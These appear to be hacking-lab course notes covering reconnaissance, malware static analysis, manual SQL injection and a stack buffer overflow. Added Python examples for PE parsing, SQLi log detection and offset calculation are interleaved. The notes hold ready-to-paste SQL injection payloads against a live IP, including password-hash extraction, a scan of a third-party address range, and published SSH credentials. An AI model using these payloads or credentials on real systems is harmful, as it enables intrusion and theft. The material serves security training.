joemccray
Just playing around....
Apr 24th, 2019
#########################
# Connect to the server #
#########################

Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.

You can download Putty from here:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


IP Address: 144.202.37.49
Protocol: ssh
Port: 22
username: np
password: n3ts1m123!



########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type This-----------------------------------
sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------


- If -sP yields no results, try:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------


- Look for hostnames:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------


- Port Scan
What's where?
------------
---------------------------Type This-----------------------------------
sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------


- Bannergrab/Version Query
What versions of software are running?
--------------------------------------

---------------------------Type This-----------------------------------
sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------


- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/

---------------------------------------------------------------------------------------------------------------------------------
The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.


Issue 1. Lack of a thorough attack process
==========================================
- Host discovery
- Service discovery
- Service version discovery
- Vulnerability research
- Linux (port 111)/Windows (port 445) enumeration
- Webserver vulnerability scan
- Directory brute force every webserver
- Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
- Brute force all services


Issue 2. Lack of automation of the process
==========================================
- Research attack scripts on the internet to enhance your methodology


Issue 3. Failing to document all steps being performed and their output
=======================================================================


Issue 4. Lack of sleep during the exam
======================================


Issue 5. Failing to reboot target machines prior to attack
==========================================================



--------------------------------------------------------------------------------------------------------------


A good strategy to use to prepare would be:

Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- CompTIA Linux+ (you should be just a hair under a Linux system administrator in skill level, with simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E



Step 2. You should be comfortable with the following tools:
-----------------------------------------------------------

Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso



Step 3. You need to be comfortable with basic exploit development
-----------------------------------------------------------------

Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl


Step 4. You need to be comfortable with privilege escalation
------------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html

----------------------------------------------------------------------------------------------------------------------------------


###################
# Static Analysis #
###################

- After logging in, please open a terminal window and type the following commands:


---------------------------Type This-----------------------------------
cd ~

mkdir static_analysis

cd static_analysis

wget http://45.63.104.73/wannacry.zip

unzip wannacry.zip
infected                (the zip password, typed when unzip prompts for it)

file wannacry.exe

mv wannacry.exe malware.pdf

file malware.pdf

mv malware.pdf wannacry.exe

hexdump -n 2 -C wannacry.exe

----------------------------------------------------------------------


***What is '4d 5a' or 'MZ'?***
Reference:
http://www.garykessler.net/library/file_sigs.html




---------------------------Type This-----------------------------------
objdump -x wannacry.exe

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
----------------------------------------------------------------------
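As an added illustration of what `file`, `hexdump -n 2` and the `strings | grep -i` loop above are actually checking (this is example code written for these notes, not part of the course), a small Python parser that reads the DOS/PE headers and triages printable strings by the same keyword list. The PE bytes are constructed inline and are not wannacry.exe.

```python
import re
import struct

# Keyword list mirrors the `strings wannacry.exe | grep -i ...` loop above.
TRIAGE_KEYWORDS = ("dll", "library", "reg", "key", "rsa", "open", "get",
                   "mutex", "irc", "join", "admin", "list")


def identify_pe(data: bytes) -> dict:
    """Recover what `file` and `hexdump -n 2` report from the bytes alone.

    A PE file starts with the DOS magic 'MZ' (4d 5a). The 32-bit field at
    offset 0x3C (e_lfanew) points at the 'PE\\0\\0' signature, which is
    followed by the COFF header (Machine, NumberOfSections, ...). None of
    this depends on the file name, which is why renaming wannacry.exe to
    malware.pdf does not change what `file` says about it.
    """
    info = {"is_mz": False, "is_pe": False, "machine": None, "sections": None}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    info["is_mz"] = True
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return info  # MZ but no PE signature: DOS-era binary, or corrupt/truncated
    info["is_pe"] = True
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    info["machine"] = {0x14C: "i386", 0x8664: "x86-64"}.get(machine, hex(machine))
    info["sections"] = nsections
    return info


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII, the same idea as the `strings` command."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage_strings(strs, keywords=TRIAGE_KEYWORDS) -> dict:
    """Group strings by every case-insensitive keyword they contain."""
    hits = {}
    for s in strs:
        low = s.lower()
        for kw in keywords:
            if kw in low:
                hits.setdefault(kw, []).append(s)
    return hits


def build_sample_pe() -> bytes:
    """Constructed stand-in for wannacry.exe: valid headers plus a few API-name
    strings. Not a runnable program and not taken from any real sample."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)            # 64-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0, 0)  # Machine=i386, 3 sections
    names = [b"KERNEL32.dll", b"ADVAPI32.dll", b"CreateMutexA",
             b"RegOpenKeyExA", b"CryptAcquireContextA", b"InternetOpenUrlA"]
    return bytes(dos) + b"PE\x00\x00" + coff + b"\x00" * 8 + b"\x00".join(names)


if __name__ == "__main__":
    sample = build_sample_pe()
    print(identify_pe(sample))
    for kw, matches in sorted(triage_strings(extract_strings(sample)).items()):
        print(f"{kw:8s} {matches}")
```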


####################################
# Analyzing Macro Embedded Malware #
####################################
---------------------------Type This-----------------------------------
mkdir ~/oledump

cd ~/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

wget http://45.63.104.73/064016.zip

unzip 064016.zip
infected                (the zip password, typed when unzip prompts for it)

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v
-----------------------------------------------------------------------



- From this we can see that this Word doc contains an embedded file called editdata.mso, which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------
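The hex-to-ASCII step above can be scripted, which also catches blobs that are split across VBA line continuations so the online converter would only see a fragment. This is an added example, not code from the course; the macro text below is constructed to mimic the obfuscation described (a long hex literal that starts with 636D and ends with 653B) and is not the real 064016.doc module.

```python
import re

# Constructed VBA excerpt, modelled on the obfuscation described above: the
# payload lives in a hex literal, split over a line continuation, and is only
# turned back into text at run time. The decoded command is a harmless
# placeholder; the second literal is a decoy like the ones in Module2.
SAMPLE_MACRO = '''
Sub GVhkjbjv()
    Dim a As String
    a = "636D642E657865202F6320" & _
        "6563686F2073616D706C653B"
    Dim junk As String
    junk = "436F6D6D656E74206F6E6C793B"
    Shell UnHex(a), vbHide
End Sub
'''

# A literal written as  "...." & _ <newline> "....."  is one string to VBA.
CONTINUATION = re.compile(r'"\s*&\s*_\s*\n\s*"')
SUSPICIOUS = ("cmd", "powershell", "wscript", "http", "temp")


def join_continuations(vba: str) -> str:
    """Rejoin split string literals so a hex run is seen whole."""
    return CONTINUATION.sub("", vba)


def decode_hex_literals(vba: str, min_hex_digits: int = 8) -> list:
    """Return (hex_literal, decoded_text) for every hex-only string literal.

    Odd-length runs are skipped: they cannot be a byte string, so they are
    usually identifiers or decoys rather than encoded data.
    """
    hex_run = re.compile(r'"([0-9A-Fa-f]{%d,})"' % min_hex_digits)
    found = []
    for m in hex_run.finditer(join_continuations(vba)):
        h = m.group(1)
        if len(h) % 2:
            continue
        found.append((h, bytes.fromhex(h).decode("latin-1")))
    return found


def triage_decoded(decoded) -> list:
    """Decoded strings worth a closer look: interpreters, URLs, temp paths."""
    return [text for _, text in decoded
            if any(marker in text.lower() for marker in SUSPICIOUS)]


if __name__ == "__main__":
    results = decode_hex_literals(SAMPLE_MACRO)
    for h, text in results:
        print(f"{h[:4]}...{h[-4:]}  ->  {text!r}")
    print("flagged:", triage_decoded(results))
```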

##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you to reference the OWASP Testing Guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

1. Does the website talk to a DB?
- Look for parameter passing (ex: site.com/page.php?id=4)
- If yes - try SQL Injection

2. Can I or someone else see what I type?
- If yes - try XSS

3. Does the page reference a file?
- If yes - try LFI/RFI

Let's start with some manual testing against 45.77.162.239


Start here:
---------------------------Paste this into Firefox-----------------------------------
http://45.77.162.239/
-----------------------------------------------------------------------

Let's try throwing a single quote (') in there:
---------------------------Paste this into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2'
-------------------------------------------------------------------------------------

I get the following error:

Unclosed quotation mark after the character string ''.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.



##############################################################################
# SQL Injection                                                              #
# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
##############################################################################


- Another quick way to test for SQLi is to remove the parameter value


#############################
# Error-Based SQL Injection #
#############################
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" just means keep going until you run out of databases
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
---------------------------------------------------------------------------------------------------------



#############################
# Union-Based SQL Injection #
#############################
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
---------------------------------------------------------------------------------------------------------

We are using a union select statement because we are joining the developer's query with one of our own.
Reference:
http://www.techonthenet.com/sql/union.php
The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
It removes duplicate rows between the various SELECT statements.

Each SELECT statement within the UNION must have the same number of fields in the result sets, with similar data types.
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
---------------------------------------------------------------------------------------------------------
Negating the parameter value (changing id=2 to id=-2) makes the developer's query return no row, so the page displays the row from our SELECT instead and shows which of the columns are echoed back.

---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
---------------------------------------------------------------------------------------------------------
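To make the ORDER BY / UNION reasoning above concrete, here is an added example (written for these notes; not the course's code and not the real bookdetail.aspx) that uses an in-memory SQLite database as a stand-in for the SQL Server backend. It shows the handler pattern that makes `?id=` injectable (the raw value is concatenated into the SQL), the same handler with a bound parameter, and the ORDER BY binary search that finds the column count the way the 100/50/25/10/5 URLs do by hand. The bookmaster table contents are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the bookmaster table behind bookdetail.aspx."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bookmaster (id INTEGER, title TEXT, author TEXT, price REAL)")
    con.executemany("INSERT INTO bookmaster VALUES (?, ?, ?, ?)",
                    [(1, "First Book", "A. Author", 9.5),
                     (2, "Second Book", "B. Writer", 12.0)])
    return con


def bookdetail_vulnerable(con, id_param: str) -> list:
    """The pattern behind ?id=: the raw parameter is pasted into the SQL text."""
    sql = "SELECT id, title, author, price FROM bookmaster WHERE id = " + id_param
    return con.execute(sql).fetchall()


def bookdetail_parameterized(con, id_param: str) -> list:
    """Hardened form: the value must be an int and is bound, never parsed as SQL."""
    sql = "SELECT id, title, author, price FROM bookmaster WHERE id = ?"
    return con.execute(sql, (int(id_param),)).fetchall()


def handle_request(con, id_param: str, hardened: bool) -> tuple:
    """Mimic the page: ('ok', rows) or ('error', message), like the .NET error page."""
    try:
        handler = bookdetail_parameterized if hardened else bookdetail_vulnerable
        return ("ok", handler(con, id_param))
    except (ValueError, sqlite3.Error) as exc:
        return ("error", str(exc))


def probe_column_count(con, upper: int = 100) -> int:
    """Binary search with ORDER BY n, as the 100/50/25/10/5... URLs do by hand.

    ORDER BY n succeeds while n <= number of columns in the developer's
    SELECT and errors beyond it, so the largest working n is the column count.
    """
    lo, hi = 1, upper  # ORDER BY 1 always works; ORDER BY 100 is assumed to fail
    while lo < hi:
        mid = (lo + hi + 1) // 2
        status, _ = handle_request(con, f"2 order by {mid}--", hardened=False)
        if status == "ok":
            lo = mid
        else:
            hi = mid - 1
    return lo


if __name__ == "__main__":
    db = make_db()
    probe = "-2 union all select 1,2,sqlite_version(),4--"  # sqlite_version() stands in for @@version
    print("single quote:", handle_request(db, "2'", False))
    print("columns:", probe_column_count(db))
    print("union (vulnerable):", handle_request(db, probe, False))
    print("union (hardened):", handle_request(db, probe, True))
```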



- Another way is to see if you can get the backend to perform an arithmetic function
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=(2)
http://45.77.162.239/bookdetail.aspx?id=(4-2)
http://45.77.162.239/bookdetail.aspx?id=(4-1)
---------------------------------------------------------------------------------------------------------

- This is some true/false logic testing
---------------------------Paste this into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
http://45.77.162.239/bookdetail.aspx?id=1*1
http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
http://45.77.162.239/bookdetail.aspx?id=2 &0#
-------------------------------------------------------------------------------------

-- Now that we've seen the differences in the webpage with True/False SQL Injection, let's see what we can learn using it
---------------------------Paste this into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
---------------------------------------------------------------------------------------


###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
---------------------------------------------------------------------------------------------------------

Let's go for a quick check to see if it's DBO
---------------------------Paste this into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
-------------------------------------------------------------------------------------
Yup, it waited 10 seconds, so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

D - 1st Character
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, the first letter is ASCII 100, which is the letter 'd' - it waited 10 seconds)
---------------------------------------------------------------------------------------------------------

B - 2nd Character
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
---------------------------------------------------------------------------------------------------------

O - 3rd Character
---------------------------Paste these one line at a time into Firefox-----------------------------------
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good, it waited for 10 seconds
---------------------------------------------------------------------------------------------------------
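Every probe in the SQL injection sections above leaves a distinctive trace in the web server log, and the time-based ones leave two: the WAITFOR DELAY text and a request that really took about 10 seconds. As an added example (not part of the course), here is detection logic that classifies requests into the families walked through above and, for time-based probes, checks the IIS time-taken field to tell which conditions the server actually confirmed. The log excerpt is constructed, with the probes from these notes URL-encoded the way a browser sends them.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from a real server). The cs-uri-query
# values mirror the probes above: a stray quote, DB_NAME(), ORDER BY / UNION,
# AND 1=2, and WAITFOR DELAY '00:00:10'. time-taken is in milliseconds.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2019-04-24 10:00:01 10.0.0.5 GET /bookdetail.aspx id=2 198.51.100.7 200 31
2019-04-24 10:00:05 10.0.0.5 GET /bookdetail.aspx id=2%27 198.51.100.7 500 28
2019-04-24 10:00:09 10.0.0.5 GET /bookdetail.aspx id=2%20or%201%20in%20(SELECT%20DB_NAME(0))-- 198.51.100.7 500 30
2019-04-24 10:00:15 10.0.0.5 GET /bookdetail.aspx id=2%20order%20by%20100-- 198.51.100.7 500 27
2019-04-24 10:00:21 10.0.0.5 GET /bookdetail.aspx id=-2%20union%20all%20select%201,2,3,4,5,6,7,8,9-- 198.51.100.7 200 33
2019-04-24 10:00:30 10.0.0.5 GET /bookdetail.aspx id=2%20and%201=2-- 198.51.100.7 200 29
2019-04-24 10:00:41 10.0.0.5 GET /bookdetail.aspx id=2;%20IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20%2700:00:10%27-- 198.51.100.7 200 10034
2019-04-24 10:01:02 10.0.0.5 GET /bookdetail.aspx id=2;%20IF%20(LEN(USER)=4)%20WAITFOR%20DELAY%20%2700:00:10%27-- 198.51.100.7 200 35
2019-04-24 10:01:10 10.0.0.5 GET /bookdetail.aspx id=3 203.0.113.9 200 30
"""

# Families in the order the notes introduce them; a request may match several.
SIGNATURES = [
    ("time-based",    re.compile(r"waitfor\s+delay|\bsleep\s*\(|benchmark\s*\(", re.I)),
    ("union-based",   re.compile(r"union\s+(all\s+)?select|order\s+by\s+\d+", re.I)),
    ("error-based",   re.compile(r"db_name\s*\(|sysobjects|@@version|@@servername", re.I)),
    ("boolean-based", re.compile(r"\b(and|or)\s+\d+\s*(=|<>|!=|<|>)\s*-?\d+", re.I)),
]
DELAY_THRESHOLD_MS = 9000  # WAITFOR DELAY '00:00:10' shows up as roughly 10000 ms


def parse_w3c(text: str) -> list:
    """Parse W3C extended log lines into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def classify(query: str) -> list:
    """Injection families present in a URL-decoded query string; [] if none."""
    decoded = unquote_plus(query)
    families = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not families and "'" in decoded:
        families = ["quote-probe"]  # the bare ' behind the 'Unclosed quotation mark' error
    return families


def analyze_log(text: str) -> list:
    """Flag suspicious requests; for time-based ones, record whether the server stalled."""
    flagged = []
    for row in parse_w3c(text):
        families = classify(row.get("cs-uri-query", ""))
        if not families:
            continue
        taken = int(row.get("time-taken", "0"))
        flagged.append({
            "time": f'{row["date"]} {row["time"]}',
            "client": row["c-ip"],
            "query": unquote_plus(row["cs-uri-query"]),
            "families": families,
            "status": row["sc-status"],
            "delay_observed": "time-based" in families and taken >= DELAY_THRESHOLD_MS,
        })
    return flagged


def per_client_counts(flagged: list) -> dict:
    """How many flagged requests each client IP sent."""
    counts = {}
    for f in flagged:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for h in hits:
        mark = "DELAY CONFIRMED" if h["delay_observed"] else ""
        print(h["time"], h["client"], h["status"], h["families"], mark, h["query"])
    print(per_client_counts(hits))
```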

#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the link below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip


- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc, type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option "edit with notepad++"

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP is overwritten with 396F4338; read as the little-endian bytes that sat on the stack, that is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy it and paste the code into the host.
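How steps 3 to 5 get from the EIP value 396F4338 to a byte count, as an added example (written for these notes, not one of the course's scripts): the pattern is generated in the same layout as Metasploit's pattern_create.rb (Aa0Aa1...), the EIP value is unpacked little-endian into the search string 8Co9 (struct.pack, which ff5.py asks about, is the same conversion in the other direction), and the distance is found. The result, 2006, matches the number in the name of script 5; the check buffer is filler plus 42424242 and nothing else.

```python
import string
import struct


def pattern_create(length: int) -> str:
    """Non-repeating pattern in the pattern_create.rb layout: an upper, a lower
    and a digit, with the digit cycling fastest (Aa0Aa1...Aa9Ab0...)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    cycle = "".join(chunks)            # 20280 chars before the sequence repeats
    return (cycle * (length // len(cycle) + 1))[:length]


def eip_to_search_string(eip: int) -> str:
    """EIP is loaded from the stack little-endian, so the value 0x396F4338 came
    from the bytes 38 43 6F 39 in memory, i.e. the text '8Co9'."""
    return struct.pack("<I", eip).decode("ascii")


def pattern_offset(eip: int, length: int = 3000):
    """Distance from the start of the pattern to the 4 bytes that landed in EIP.

    Returns None when the value is not in the pattern, which usually means EIP
    was not overwritten by our data at all.
    """
    needle = eip_to_search_string(eip)
    pat = pattern_create(length)
    idx = pat.find(needle)
    if idx == -1:
        idx = pat.find(needle[::-1])   # value copied out of the debugger as raw bytes
    return None if idx == -1 else idx


def build_eip_check(offset: int, marker: int = 0x42424242) -> bytes:
    """Step 5's check: `offset` bytes of filler, then the value that must show up in EIP."""
    return b"A" * offset + struct.pack("<I", marker)


if __name__ == "__main__":
    eip = 0x396F4338
    off = pattern_offset(eip)
    print("search string:", eip_to_search_string(eip))
    print("distance to EIP:", off)
    print("check buffer length:", len(build_eip_check(off)))
```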


------------------------------



#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################



Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable 'junk2'.




